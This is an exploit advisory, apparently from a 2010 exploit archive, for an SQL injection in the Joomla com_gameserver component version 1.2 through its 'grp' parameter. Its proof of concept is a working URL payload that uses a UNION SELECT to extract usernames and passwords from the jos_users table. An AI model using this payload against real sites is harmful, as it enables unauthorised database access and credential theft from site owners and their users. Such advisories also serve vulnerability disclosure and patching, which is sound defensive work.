Joomla Component com_gameserver SQL Injection Vulnerability by h3m4n

VIEWS: 67 PAGES: 1

									                      Joomla Component com_gameserver SQL Injection Vulnerability                                 Page 1/1
  1    #   Exploit Title: Joomla (com_gameserver) SQL Injection Vulnerability
  2    #   Date: 2010−01−22
  3    #   Author: B−Hunt3|2
  4    #   Software Link: http://joomlacode.org/gf/project/gameserver/frs/
  5    #   Version: 1.2
  6    #   CVE : N/A
  7
  8    [~]>> ...[BEGIN ADVISORY]...
  9
  10   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  11
  12   [~]>>   TITLE: Joomla (com_gameserver) SQL Injection Vulnerability
  13   [~]>>   LANGUAGE: PHP
  14   [~]>>   DORK: N/A
  15   [~]>>   RESEARCHER: B−HUNT3|2
  16   [~]>>   CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
  17   [~]>>   TESTED ON: Demo Site
  18
  19   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  20
  21   [~]>>   DESCRIPTION: Input var "grp" is vulnerable to SQL code injection.
  22   [~]>>   AFFECTED VERSIONS: Confirmed in 1.2 but probably other versions also.
  23   [~]>>   RISK: High/Medium
  24   [~]>>   IMPACT: Execute Arbitrary SQL queries
  25
  26   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  27
  28   [~]>> PROOF OF CONCEPT:
  29
  30   [~]>> http://server/component/gameserver/?view=gameserver&grp=[SQL]
  31   [~]>> http://server/component/gameserver/?view=gameserver&grp=−1’+union+all+select+1,concat(username,0x3A,password),3
       ,4,5,6,7+from+jos_users%23
  32
  33   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  34
  35   [~]>> ...[END ADVISORY]...
  36




B−HUNT3 2                                                                                                          01/22/2010

								
To top